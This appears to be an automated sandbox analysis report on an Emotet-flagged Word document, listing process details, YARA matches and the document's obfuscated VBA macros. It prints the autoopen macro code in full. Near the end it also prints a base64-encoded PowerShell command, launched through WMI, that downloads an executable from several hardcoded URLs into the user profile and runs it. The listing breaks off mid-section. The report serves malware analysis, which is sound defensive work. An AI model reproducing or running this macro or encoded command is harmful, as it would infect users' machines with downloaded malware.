                MD5 hash:3A74A93E7831D0953B5CEFB9C98505F1
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Emotet, Description: detect Emotet in memory, Source: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: Emotet, Description: detect Emotet in memory, Source: 0000000B.00000002.327425390.005B3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                Chronological Activities

                Analysis Process: sortedwatched.exe PID: 3780 Parent PID: 3672

                General

                Start time:13:30:01
                Start date:20/09/2019
                Path:C:\Windows\System32\sortedwatched.exe
                Wow64 process (32bit):false
                Commandline:--2a75e385
                Imagebase:0x400000
                File size:425472 bytes
                MD5 hash:3A74A93E7831D0953B5CEFB9C98505F1
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Emotet, Description: detect Emotet in memory, Source: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: Emotet, Description: detect Emotet in memory, Source: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                Chronological Activities

                Disassembly

                Code Analysis

                VBA Code

                Call Graph

                Graph

                Module: JIodCjfv

                Declaration
                LineContent
                1

                Attribute VB_Name = "JIodCjfv"

                Executed Functions
                Subroutine autoopen, APIs: 165, Strings: 0, Number of lines: 27, Relevance: 249.027
                APIsMeta Information

                xqmm6672

                wqLToroz

                Na5naWHG

                Tan

                ol1JHUw

                CDate

                tHW47ffa

                Hj82oV

                CDHkaIfU

                HZGOlw

                CStr

                EO5s3Wov

                ruLzmW

                NAJ70I4

                Xfh3Uz

                ChrW

                Oct

                CDate

                Fix

                ZBpK33S

                EnmJEs2

                RRZ6BWC

                Sin

                Frj8OZbd

                fXaz2u

                D5Yzqc

                Count

                RecentFiles

                Part of subcall function dztj37@snLF1V: xqmm6672

                Part of subcall function dztj37@snLF1V: M3oCwG

                Part of subcall function dztj37@snLF1V: PFAGKSc

                Part of subcall function dztj37@snLF1V: Tan

                Part of subcall function dztj37@snLF1V: Btc0KuW

                Part of subcall function dztj37@snLF1V: CDate

                Part of subcall function dztj37@snLF1V: fCMUHn

                Part of subcall function dztj37@snLF1V: pUBdAcb

                Part of subcall function dztj37@snLF1V: WLAEkzsu

                Part of subcall function dztj37@snLF1V: z5_aQ54

                Part of subcall function dztj37@snLF1V: CStr

                Part of subcall function dztj37@snLF1V: q2NS516

                Part of subcall function dztj37@snLF1V: uBRAVT

                Part of subcall function dztj37@snLF1V: tkw6vj

                Part of subcall function dztj37@snLF1V: oc2GT0i

                Part of subcall function dztj37@snLF1V: ChrW

                Part of subcall function dztj37@snLF1V: Oct

                Part of subcall function dztj37@snLF1V: CDate

                Part of subcall function dztj37@snLF1V: Fix

                Part of subcall function dztj37@snLF1V: FRqJIU

                Part of subcall function dztj37@snLF1V: MAPHFj

                Part of subcall function dztj37@snLF1V: A9hSFQf9

                Part of subcall function dztj37@snLF1V: Sin

                Part of subcall function dztj37@snLF1V: Bt4u6CG

                Part of subcall function dztj37@snLF1V: PcG7it_

                Part of subcall function dztj37@snLF1V: zir7hM

                Part of subcall function dztj37@snLF1V: vq219c

                Part of subcall function dztj37@snLF1V: zJWspwz

                Part of subcall function dztj37@snLF1V: VHfL_K2S

                Part of subcall function dztj37@snLF1V: YAHvQ_

                Part of subcall function dztj37@snLF1V: xqmm6672

                Part of subcall function dztj37@snLF1V: LXv84MXp

                Part of subcall function dztj37@snLF1V: JSjBjs

                Part of subcall function dztj37@snLF1V: Tan

                Part of subcall function dztj37@snLF1V: TAw0Fzm

                Part of subcall function dztj37@snLF1V: CDate

                Part of subcall function dztj37@snLF1V: C0DzNIbd

                Part of subcall function dztj37@snLF1V: dpjKqtAS

                Part of subcall function dztj37@snLF1V: iaXsMY1

                Part of subcall function dztj37@snLF1V: TniCd0t

                Part of subcall function dztj37@snLF1V: CStr

                Part of subcall function dztj37@snLF1V: k5bY2L

                Part of subcall function dztj37@snLF1V: t1HQFfiz

                Part of subcall function dztj37@snLF1V: BnCM82w

                Part of subcall function dztj37@snLF1V: ZNRIEN

                Part of subcall function dztj37@snLF1V: ChrW

                Part of subcall function dztj37@snLF1V: Oct

                Part of subcall function dztj37@snLF1V: CDate

                Part of subcall function dztj37@snLF1V: Fix

                Part of subcall function dztj37@snLF1V: Ghn4llZ

                Part of subcall function dztj37@snLF1V: UF1nKaU6

                Part of subcall function dztj37@snLF1V: wDZDIUTV

                Part of subcall function dztj37@snLF1V: Sin

                Part of subcall function dztj37@snLF1V: L8Zz21

                Part of subcall function dztj37@snLF1V: lnY3HW

                Part of subcall function dztj37@snLF1V: jXUw9Oz

                Part of subcall function dztj37@snLF1V: Create

                Part of subcall function dztj37@snLF1V: ZKnIZEfd

                Part of subcall function dztj37@snLF1V: khjUo3du

                Part of subcall function dztj37@snLF1V: xqmm6672

                Part of subcall function dztj37@snLF1V: wWOoNnTo

                Part of subcall function dztj37@snLF1V: MSfBRT

                Part of subcall function dztj37@snLF1V: Tan

                Part of subcall function dztj37@snLF1V: z5liGH

                Part of subcall function dztj37@snLF1V: CDate

                Part of subcall function dztj37@snLF1V: TuYSA6

                Part of subcall function dztj37@snLF1V: KWit9B

                Part of subcall function dztj37@snLF1V: tqXjFCw

                Part of subcall function dztj37@snLF1V: pSZQnNn

                Part of subcall function dztj37@snLF1V: CStr

                Part of subcall function dztj37@snLF1V: wT5D9BcE

                Part of subcall function dztj37@snLF1V: wMR9tP

                Part of subcall function dztj37@snLF1V: LDjJ6zM

                Part of subcall function dztj37@snLF1V: bUqA9z5

                Part of subcall function dztj37@snLF1V: ChrW

                Part of subcall function dztj37@snLF1V: Oct

                Part of subcall function dztj37@snLF1V: CDate

                Part of subcall function dztj37@snLF1V: Fix

                Part of subcall function dztj37@snLF1V: jYQWvaN

                Part of subcall function dztj37@snLF1V: vDZE63w

                Part of subcall function dztj37@snLF1V: UYGTL2Tr

                Part of subcall function dztj37@snLF1V: Sin

                Part of subcall function dztj37@snLF1V: CmXBWjb

                Part of subcall function dztj37@snLF1V: X975_m

                Part of subcall function dztj37@snLF1V: zcazMGDf

                Part of subcall function dztj37@snLF1V: xqmm6672

                Part of subcall function dztj37@snLF1V: Pu1R8IUO

                Part of subcall function dztj37@snLF1V: aXF2_4qQ

                Part of subcall function dztj37@snLF1V: Tan

                Part of subcall function dztj37@snLF1V: tcDLLb

                Part of subcall function dztj37@snLF1V: CDate

                Part of subcall function dztj37@snLF1V: lsaWRUr

                Part of subcall function dztj37@snLF1V: ShWp3jNB

                Part of subcall function dztj37@snLF1V: tnXUzJ0O

                Part of subcall function dztj37@snLF1V: MM3V6h

                Part of subcall function dztj37@snLF1V: CStr

                Part of subcall function dztj37@snLF1V: GdQwslU

                Part of subcall function dztj37@snLF1V: j_72KM

                Part of subcall function dztj37@snLF1V: HpAvVal

                Part of subcall function dztj37@snLF1V: cLEAWn

                Part of subcall function dztj37@snLF1V: ChrW

                Part of subcall function dztj37@snLF1V: Oct

                Part of subcall function dztj37@snLF1V: CDate

                Part of subcall function dztj37@snLF1V: Fix

                Part of subcall function dztj37@snLF1V: lA6KKk

                Part of subcall function dztj37@snLF1V: J3J3pfPR

                Part of subcall function dztj37@snLF1V: hzkYTP82

                Part of subcall function dztj37@snLF1V: Sin

                Part of subcall function dztj37@snLF1V: cISYkJs

                Part of subcall function dztj37@snLF1V: Sff8wzaz

                Part of subcall function dztj37@snLF1V: B8wUj_W

                xqmm6672

                whapPJb

                ow8oQWti

                Tan

                YcqUOCsQ

                CDate

                OkzDrVT

                CBH1HB

                mzTRZThP

                ATaMOL

                CStr

                bQrbmIrJ

                SnjS4W9c

                i2w7lPf

                lbDPzY6

                ChrW

                Oct

                CDate

                Fix

                w3wS1B

                zaBTww

                Mntl4i7

                Sin

                dOmmAiqP

                Fi6Vjz

                XZJ7qqlh

                LineInstructionMeta Information
                2

                Sub autoopen()

                3

                On Error Resume Next

                executed
                4

                Set mna = xqmm6672

                xqmm6672

                5

                Do

                fXaz2u

                D5Yzqc

                6

                If wqLToroz = Na5naWHG Then

                wqLToroz

                Na5naWHG

                7

                PhaBus1_ = Tan(1141)

                Tan

                8

                Endif

                9

                qNXwDA = ol1JHUw * CDate(tHW47ffa) / Hj82oV / CDHkaIfU + (HZGOlw / CStr(EO5s3Wov) / 3 * CStr(ruLzmW))

                ol1JHUw

                CDate

                tHW47ffa

                Hj82oV

                CDHkaIfU

                HZGOlw

                CStr

                EO5s3Wov

                ruLzmW

                10

                For Each oSsOXl in NAJ70I4

                NAJ70I4

                11

                OEVLv8 = Xfh3Uz - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(ZBpK33S) - 6977 - EnmJEs2 - RRZ6BWC * Sin(Frj8OZbd)

                Xfh3Uz

                ChrW

                Oct

                CDate

                Fix

                ZBpK33S

                EnmJEs2

                RRZ6BWC

                Sin

                Frj8OZbd

                12

                Next

                NAJ70I4

                13

                Loop Until fXaz2u = D5Yzqc

                fXaz2u

                D5Yzqc

                14

                If RecentFiles.Count > 3 Then

                Count

                RecentFiles

                15

                dztj37

                16

                Endif

                17

                On Error Resume Next

                18

                Set mna = xqmm6672

                xqmm6672

                19

                Do

                Fi6Vjz

                XZJ7qqlh

                20

                If whapPJb = ow8oQWti Then

                whapPJb

                ow8oQWti

                21

                cc6fSzI = Tan(1141)

                Tan

                22

                Endif

                23

                nI9cqO = YcqUOCsQ * CDate(OkzDrVT) / CBH1HB / mzTRZThP + (ATaMOL / CStr(bQrbmIrJ) / 3 * CStr(SnjS4W9c))

                YcqUOCsQ

                CDate

                OkzDrVT

                CBH1HB

                mzTRZThP

                ATaMOL

                CStr

                bQrbmIrJ

                SnjS4W9c

                24

                For Each sRRzpU in i2w7lPf

                i2w7lPf

                25

                QMKkQZu4 = lbDPzY6 - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(w3wS1B) - 6977 - zaBTww - Mntl4i7 * Sin(dOmmAiqP)

                lbDPzY6

                ChrW

                Oct

                CDate

                Fix

                w3wS1B

                zaBTww

                Mntl4i7

                Sin

                dOmmAiqP

                26

                Next

                i2w7lPf

                27

                Loop Until Fi6Vjz = XZJ7qqlh

                Fi6Vjz

                XZJ7qqlh

                28

                End Sub

                Function R3tnEz2D, APIs: 163, Strings: 0, Number of lines: 49, Relevance: 246.049
                APIsMeta Information

                kULEiwf

                DAbbE9mG

                xqmm6672

                f1ocqu

                wZfG2P

                Tan

                DtWubh

                CDate

                NdN1rET

                NosNmj4

                kZ3OzYB

                TtIw36Hv

                CStr

                pkcNH7C

                rbJdmEz

                ZwwF3I

                qcOQjrD

                ChrW

                Oct

                CDate

                Fix

                mwv_hRR

                cCsukAJS

                T4t4PSN

                Sin

                WrztcmHX

                N06UkOi

                sNGNZi

                CreateObject

                		CreateObject("winmgmts:Win32_ProcessStartup")

                lTzGN9z

                Part of subcall function UMvDUH@snLF1V: xqmm6672

                Part of subcall function UMvDUH@snLF1V: CP2pOzYD

                Part of subcall function UMvDUH@snLF1V: m_MLhXX

                Part of subcall function UMvDUH@snLF1V: Tan

                Part of subcall function UMvDUH@snLF1V: huhEoJG

                Part of subcall function UMvDUH@snLF1V: CDate

                Part of subcall function UMvDUH@snLF1V: az_UGd0

                Part of subcall function UMvDUH@snLF1V: a21jZbL3

                Part of subcall function UMvDUH@snLF1V: pn7zEK

                Part of subcall function UMvDUH@snLF1V: N0vGGku

                Part of subcall function UMvDUH@snLF1V: CStr

                Part of subcall function UMvDUH@snLF1V: fMoOoWO3

                Part of subcall function UMvDUH@snLF1V: EUG4z12

                Part of subcall function UMvDUH@snLF1V: nP1obkp

                Part of subcall function UMvDUH@snLF1V: HG0RQi

                Part of subcall function UMvDUH@snLF1V: ChrW

                Part of subcall function UMvDUH@snLF1V: Oct

                Part of subcall function UMvDUH@snLF1V: CDate

                Part of subcall function UMvDUH@snLF1V: Fix

                Part of subcall function UMvDUH@snLF1V: zqDQZ7

                Part of subcall function UMvDUH@snLF1V: YjRQrq

                Part of subcall function UMvDUH@snLF1V: Hz5p3D

                Part of subcall function UMvDUH@snLF1V: Sin

                Part of subcall function UMvDUH@snLF1V: mjjrHIf

                Part of subcall function UMvDUH@snLF1V: Xb5lam

                Part of subcall function UMvDUH@snLF1V: diSWXniz

                Part of subcall function UMvDUH@snLF1V: Replace

                Part of subcall function UMvDUH@snLF1V: xqmm6672

                Part of subcall function UMvDUH@snLF1V: wMBYtY

                Part of subcall function UMvDUH@snLF1V: O_vT8j

                Part of subcall function UMvDUH@snLF1V: Tan

                Part of subcall function UMvDUH@snLF1V: EqHGmqzs

                Part of subcall function UMvDUH@snLF1V: CDate

                Part of subcall function UMvDUH@snLF1V: p2VQvUjT

                Part of subcall function UMvDUH@snLF1V: nJES0LA

                Part of subcall function UMvDUH@snLF1V: WiwqHbr

                Part of subcall function UMvDUH@snLF1V: XzCzPS7

                Part of subcall function UMvDUH@snLF1V: CStr

                Part of subcall function UMvDUH@snLF1V: FfJUME

                Part of subcall function UMvDUH@snLF1V: wlzHbq

                Part of subcall function UMvDUH@snLF1V: t3Fh05z

                Part of subcall function UMvDUH@snLF1V: aGJjAH

                Part of subcall function UMvDUH@snLF1V: ChrW

                Part of subcall function UMvDUH@snLF1V: Oct

                Part of subcall function UMvDUH@snLF1V: CDate

                Part of subcall function UMvDUH@snLF1V: Fix

                Part of subcall function UMvDUH@snLF1V: F97Z_Sb

                Part of subcall function UMvDUH@snLF1V: Q0hGCzd

                Part of subcall function UMvDUH@snLF1V: ojvDCQi

                Part of subcall function UMvDUH@snLF1V: Sin

                Part of subcall function UMvDUH@snLF1V: wNX30a

                Part of subcall function UMvDUH@snLF1V: qaB0m7mo

                Part of subcall function UMvDUH@snLF1V: E9cRqzhV

                QFa7Tzv

                RI34Jc

                xqmm6672

                ZD4NzNKp

                dYFvGWI

                Tan

                OObwzR

                CDate

                EIw3Db08

                T1TAVR_L

                SXvvII2T

                S1hkHVH

                CStr

                a1QujnI

                uJwlJz

                Pt5_Krw

                mjvrs8a

                ChrW

                Oct

                CDate

                Fix

                df7KLz

                rLX5_E

                qhEL6us

                Sin

                RWp2lz

                DHQs26

                CKCNjv

                xqmm6672

                hUPJJL

                oihAvpA

                Tan

                DkkCTnu

                CDate

                mQZoi014

                uNL_Qm

                EhPXLwZr

                fzbTzG6

                CStr

                T6H6cL

                U4kTbL8o

                rkbEFdX

                Iofqhj

                ChrW

                Oct

                CDate

                Fix

                fIDOjLzQ

                qf2EbLqm

                AuOCYR

                Sin

                R65fhvwm

                FnZwmD_A

                KUA7zY

                xqmm6672

                ls9iOFd

                EnzDZGz

                Tan

                AtZoc6

                CDate

                uDNHZRDB

                MLzjlI

                OuoioTjO

                h0IdWK

                CStr

                Gtz6Hz

                NWWiIQQi

                S10zzpNS

                j7Ysl2IC

                ChrW

                Oct

                CDate

                Fix

                LInuIc64

                jR1PlbP

                cn3bSi

                Sin

                GY7qmRZw

                hfW56jn

                FJHJlhv

                LineInstructionMeta Information
                29

                Function R3tnEz2D()

                30

                ZfdJRPiY = kULEiwf + DAbbE9mG

                kULEiwf

                DAbbE9mG

                executed
                31

                On Error Resume Next

                32

                Set mna = xqmm6672

                xqmm6672

                33

                Do

                N06UkOi

                sNGNZi

                34

                If f1ocqu = wZfG2P Then

                f1ocqu

                wZfG2P

                35

                EE3NY5nB = Tan(1141)

                Tan

                36

                Endif

                37

                jQhhhQSc = DtWubh * CDate(NdN1rET) / NosNmj4 / kZ3OzYB + (TtIw36Hv / CStr(pkcNH7C) / 3 * CStr(rbJdmEz))

                DtWubh

                CDate

                NdN1rET

                NosNmj4

                kZ3OzYB

                TtIw36Hv

                CStr

                pkcNH7C

                rbJdmEz

                38

                For Each BpzwCL7 in ZwwF3I

                ZwwF3I

                39

                oPMvTw = qcOQjrD - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(mwv_hRR) - 6977 - cCsukAJS - T4t4PSN * Sin(WrztcmHX)

                qcOQjrD

                ChrW

                Oct

                CDate

                Fix

                mwv_hRR

                cCsukAJS

                T4t4PSN

                Sin

                WrztcmHX

                40

                Next

                ZwwF3I

                41

                Loop Until N06UkOi = sNGNZi

                N06UkOi

                sNGNZi

                42

                Set R3tnEz2D = CreateObject(lTzGN9z + UMvDUH(ThisDocument.QFa7Tzv) + RI34Jc)

                CreateObject("winmgmts:Win32_ProcessStartup")

                lTzGN9z

                QFa7Tzv

                RI34Jc

                executed
                43

                On Error Resume Next

                44

                Set mna = xqmm6672

                xqmm6672

                45

                Do

                DHQs26

                CKCNjv

                46

                If ZD4NzNKp = dYFvGWI Then

                ZD4NzNKp

                dYFvGWI

                47

                FIHNkM = Tan(1141)

                Tan

                48

                Endif

                49

                Jd7zMAU_ = OObwzR * CDate(EIw3Db08) / T1TAVR_L / SXvvII2T + (S1hkHVH / CStr(a1QujnI) / 3 * CStr(uJwlJz))

                OObwzR

                CDate

                EIw3Db08

                T1TAVR_L

                SXvvII2T

                S1hkHVH

                CStr

                a1QujnI

                uJwlJz

                50

                For Each TCu6kpE7 in Pt5_Krw

                Pt5_Krw

                51

                FnLI_N = mjvrs8a - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(df7KLz) - 6977 - rLX5_E - qhEL6us * Sin(RWp2lz)

                mjvrs8a

                ChrW

                Oct

                CDate

                Fix

                df7KLz

                rLX5_E

                qhEL6us

                Sin

                RWp2lz

                52

                Next

                Pt5_Krw

                53

                Loop Until DHQs26 = CKCNjv

                DHQs26

                CKCNjv

                54

                R3tnEz2D.ShowWindow! = ZfdJRPiY

                55

                On Error Resume Next

                56

                Set mna = xqmm6672

                xqmm6672

                57

                Do

                FnZwmD_A

                KUA7zY

                58

                If hUPJJL = oihAvpA Then

                hUPJJL

                oihAvpA

                59

                CCj5oD = Tan(1141)

                Tan

                60

                Endif

                61

                YGuUZX = DkkCTnu * CDate(mQZoi014) / uNL_Qm / EhPXLwZr + (fzbTzG6 / CStr(T6H6cL) / 3 * CStr(U4kTbL8o))

                DkkCTnu

                CDate

                mQZoi014

                uNL_Qm

                EhPXLwZr

                fzbTzG6

                CStr

                T6H6cL

                U4kTbL8o

                62

                For Each SFnP24Y in rkbEFdX

                rkbEFdX

                63

                wnwME5Aw = Iofqhj - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(fIDOjLzQ) - 6977 - qf2EbLqm - AuOCYR * Sin(R65fhvwm)

                Iofqhj

                ChrW

                Oct

                CDate

                Fix

                fIDOjLzQ

                qf2EbLqm

                AuOCYR

                Sin

                R65fhvwm

                64

                Next

                rkbEFdX

                65

                Loop Until FnZwmD_A = KUA7zY

                FnZwmD_A

                KUA7zY

                66

                On Error Resume Next

                67

                Set mna = xqmm6672

                xqmm6672

                68

                Do

                hfW56jn

                FJHJlhv

                69

                If ls9iOFd = EnzDZGz Then

                ls9iOFd

                EnzDZGz

                70

                iYU6MXV = Tan(1141)

                Tan

                71

                Endif

                72

                JK1i0j = AtZoc6 * CDate(uDNHZRDB) / MLzjlI / OuoioTjO + (h0IdWK / CStr(Gtz6Hz) / 3 * CStr(NWWiIQQi))

                AtZoc6

                CDate

                uDNHZRDB

                MLzjlI

                OuoioTjO

                h0IdWK

                CStr

                Gtz6Hz

                NWWiIQQi

                73

                For Each FWa6lK in S10zzpNS

                S10zzpNS

                74

                FXnzwzC = j7Ysl2IC - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(LInuIc64) - 6977 - jR1PlbP - cn3bSi * Sin(GY7qmRZw)

                j7Ysl2IC

                ChrW

                Oct

                CDate

                Fix

                LInuIc64

                jR1PlbP

                cn3bSi

                Sin

                GY7qmRZw

                75

                Next

                S10zzpNS

                76

                Loop Until hfW56jn = FJHJlhv

                hfW56jn

                FJHJlhv

                77

                End Function

                Module: ThisDocument

                Declaration
                LineContent
                1

                Attribute VB_Name = "ThisDocument"

                2

                Attribute VB_Base = "1Normal.ThisDocument"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = True

                8

                Attribute VB_Customizable = True

                9

                Attribute VB_Control = "FikbdQZ, 0, 0, MSForms, TextBox"

                10

                Attribute VB_Control = "N2SpOiID, 1, 1, MSForms, TextBox"

                11

                Attribute VB_Control = "mwXI7m, 2, 2, MSForms, TextBox"

                12

                Attribute VB_Control = "P83AcXTu, 3, 3, MSForms, TextBox"

                13

                Attribute VB_Control = "QFa7Tzv, 4, 4, MSForms, TextBox"

                14

                Attribute VB_Control = "TCRM9sqj, 5, 5, MSForms, TextBox"

                15

                Attribute VB_Control = "VEYjp2, 6, 6, MSForms, TextBox"

                16

                Attribute VB_Control = "VHfL_K2S, 7, 7, MSForms, TextBox"

                17

                Attribute VB_Control = "w6kwiq, 8, 8, MSForms, TextBox"

                18

                Attribute VB_Control = "hjjzVw, 9, 9, MSForms, TextBox"

                19

                Attribute VB_Control = "cZDuVz, 10, 10, MSForms, TextBox"

                20

                Attribute VB_Control = "JSEp1Hh, 11, 11, MSForms, TextBox"

                21

                Attribute VB_Control = "uXSvzY, 12, 12, MSForms, TextBox"

                22

                Attribute VB_Control = "GoWsRhk, 13, 13, MSForms, TextBox"

                23

                Attribute VB_Control = "zJWspwz, 14, 14, MSForms, TextBox"

                24

                Attribute VB_Control = "kE4iQQr, 15, 15, MSForms, TextBox"

                25

                Attribute VB_Control = "TRF9Wz, 16, 16, MSForms, TextBox"

                26

                Attribute VB_Control = "qijkYG, 17, 17, MSForms, TextBox"

                27

                Attribute VB_Control = "btn5hVS, 18, 18, MSForms, TextBox"

                28

                Attribute VB_Control = "GUl0LE, 19, 19, MSForms, TextBox"

                Module: snLF1V

                Declaration
                LineContent
                1

                Attribute VB_Name = "snLF1V"

                Executed Functions
                Function dztj37, APIs: 274, Strings: 1, Number of lines: 48, Relevance: 490.048
                APIsMeta Information

                xqmm6672

                M3oCwG

                PFAGKSc

                Tan

                Btc0KuW

                CDate

                fCMUHn

                pUBdAcb

                WLAEkzsu

                z5_aQ54

                CStr

                q2NS516

                uBRAVT

                tkw6vj

                oc2GT0i

                ChrW

                Oct

                CDate

                Fix

                FRqJIU

                MAPHFj

                A9hSFQf9

                Sin

                Bt4u6CG

                PcG7it_

                zir7hM

                vq219c

                Part of subcall function UMvDUH@snLF1V: xqmm6672

                Part of subcall function UMvDUH@snLF1V: CP2pOzYD

                Part of subcall function UMvDUH@snLF1V: m_MLhXX

                Part of subcall function UMvDUH@snLF1V: Tan

                Part of subcall function UMvDUH@snLF1V: huhEoJG

                Part of subcall function UMvDUH@snLF1V: CDate

                Part of subcall function UMvDUH@snLF1V: az_UGd0

                Part of subcall function UMvDUH@snLF1V: a21jZbL3

                Part of subcall function UMvDUH@snLF1V: pn7zEK

                Part of subcall function UMvDUH@snLF1V: N0vGGku

                Part of subcall function UMvDUH@snLF1V: CStr

                Part of subcall function UMvDUH@snLF1V: fMoOoWO3

                Part of subcall function UMvDUH@snLF1V: EUG4z12

                Part of subcall function UMvDUH@snLF1V: nP1obkp

                Part of subcall function UMvDUH@snLF1V: HG0RQi

                Part of subcall function UMvDUH@snLF1V: ChrW

                Part of subcall function UMvDUH@snLF1V: Oct

                Part of subcall function UMvDUH@snLF1V: CDate

                Part of subcall function UMvDUH@snLF1V: Fix

                Part of subcall function UMvDUH@snLF1V: zqDQZ7

                Part of subcall function UMvDUH@snLF1V: YjRQrq

                Part of subcall function UMvDUH@snLF1V: Hz5p3D

                Part of subcall function UMvDUH@snLF1V: Sin

                Part of subcall function UMvDUH@snLF1V: mjjrHIf

                Part of subcall function UMvDUH@snLF1V: Xb5lam

                Part of subcall function UMvDUH@snLF1V: diSWXniz

                Part of subcall function UMvDUH@snLF1V: Replace

                Part of subcall function UMvDUH@snLF1V: xqmm6672

                Part of subcall function UMvDUH@snLF1V: wMBYtY

                Part of subcall function UMvDUH@snLF1V: O_vT8j

                Part of subcall function UMvDUH@snLF1V: Tan

                Part of subcall function UMvDUH@snLF1V: EqHGmqzs

                Part of subcall function UMvDUH@snLF1V: CDate

                Part of subcall function UMvDUH@snLF1V: p2VQvUjT

                Part of subcall function UMvDUH@snLF1V: nJES0LA

                Part of subcall function UMvDUH@snLF1V: WiwqHbr

                Part of subcall function UMvDUH@snLF1V: XzCzPS7

                Part of subcall function UMvDUH@snLF1V: CStr

                Part of subcall function UMvDUH@snLF1V: FfJUME

                Part of subcall function UMvDUH@snLF1V: wlzHbq

                Part of subcall function UMvDUH@snLF1V: t3Fh05z

                Part of subcall function UMvDUH@snLF1V: aGJjAH

                Part of subcall function UMvDUH@snLF1V: ChrW

                Part of subcall function UMvDUH@snLF1V: Oct

                Part of subcall function UMvDUH@snLF1V: CDate

                Part of subcall function UMvDUH@snLF1V: Fix

                Part of subcall function UMvDUH@snLF1V: F97Z_Sb

                Part of subcall function UMvDUH@snLF1V: Q0hGCzd

                Part of subcall function UMvDUH@snLF1V: ojvDCQi

                Part of subcall function UMvDUH@snLF1V: Sin

                Part of subcall function UMvDUH@snLF1V: wNX30a

                Part of subcall function UMvDUH@snLF1V: qaB0m7mo

                Part of subcall function UMvDUH@snLF1V: E9cRqzhV

                zJWspwz

                VHfL_K2S

                YAHvQ_

                xqmm6672

                LXv84MXp

                JSjBjs

                Tan

                TAw0Fzm

                CDate

                C0DzNIbd

                dpjKqtAS

                iaXsMY1

                TniCd0t

                CStr

                k5bY2L

                t1HQFfiz

                BnCM82w

                ZNRIEN

                ChrW

                Oct

                CDate

                Fix

                Ghn4llZ

                UF1nKaU6

                wDZDIUTV

                Sin

                L8Zz21

                lnY3HW

                jXUw9Oz

                Create

                		SWbemObjectEx.Create("powershell -encod JABtAEgASwB3AFIARgA9ACcASgBJAGIAbgB2AGYAbwBMACcAOwAkAGIAMwBhAFMAaQBtADQAXwAgAD0AIAAnADkAOAAyACcAOwAkAEcAdgBIAEsAMgBNAD0AJwBuAF8AdgBQAGoAcgBwACcAOwAkAFEAegBpAEEAQgBCADYATAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgAzAGEAUwBpAG0ANABfACsAJwAuAGUAeABlACcAOwAkAGoAdwB0ADcAXwBOAD0AJwBaADYARwA2AG8AVABvAFMAJwA7ACQAegBfAG4AZgAwADkAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEUASQBwAFMARwB3AHUAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAGEAYgBpAG8AcwBkAGUAbABhAG0AbwByAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAdAB5AEUAcQBvAEUAbABvAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBlAHUAcgBvAGEAdQBzAGkAbABpAC4AaQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGkASQBGAFMAWABUAFcAbQBOAC8AQABoAHQAdABwAHMAOgAvAC8AbwBwAGUAbAAuAGsAbQAuAHUAYQAvAGIAbABvAGcAcwAvADMAdQBqAHUAXwB0AGkAbwB3AGYAOQBpAC0AMQA0ADkALwBAAGgAdAB0AHAAcwA6AC8ALwBoAGEAYgBsAGEAYgBlAHMAdABvAHAALgBsAGkAdgBlAC8AcgBxAGIAZQA5AHAALwBwAEsAawBMAGkAdQBxAEcAagAvAEAAaAB0AHQAcABzADoALwAvAGQAbwBnAG8AbgBnAHUAbABvAG4AZwAuAHYAbgAvAHcAcAAtAGEAZABtAGkAbgAvAHYAYQBJAEQAZQB5AEQAagAvACcALgAiAHMAUABgAGwAaQBUACIAKAAnAEAAJwApADsAJABYAG4AOQBUAGoAcQBpAD0AJwBXADUANAA4AEcAUABiAGkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAaQBYAEgAaQBXACAAaQBuACAAJABFAEkAcABTAEcAdwB1ACkAewB0AHIAeQB7ACQAegBfAG4AZgAwADkALgAiAGQAYABvAHcAYABOAGAAbABPAEEARABGAEkAbABlACIAKAAkAEMAaQBYAEgAaQBXACwAIAAkAFEAegBpAEEAQgBCADYATAApADsAJABIAEkAaQBIAFcAVwBTAGYAPQAnAGoASAA4AG8ASQBNACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQAUQB6AGkAQQBCAEIANgBMACkALgAiAGwAZQBOAGAAZwB0AEgAIgAgAC0AZwBlACAAMwAyADMAOAA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAcgB0ACIAKAAkAFEAegBpAEEAQgBCADYATAApADsAJABLAEMAYgBzAGoAawA9ACcAdwBBAHAATQB2AGEAYQAnADsAYgByAGUAYQBrADsAJAB2AGoAbAA4AFEATAB3AD0AJwBRADgAUAB6ADUAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBADEAcwBhAEIAaAA9ACcAUQBpAEIANgA3AHIAaAA0ACcA",,,) -> 0

                ZKnIZEfd

                Part of subcall function R3tnEz2D@JIodCjfv: kULEiwf

                Part of subcall function R3tnEz2D@JIodCjfv: DAbbE9mG

                Part of subcall function R3tnEz2D@JIodCjfv: xqmm6672

                Part of subcall function R3tnEz2D@JIodCjfv: f1ocqu

                Part of subcall function R3tnEz2D@JIodCjfv: wZfG2P

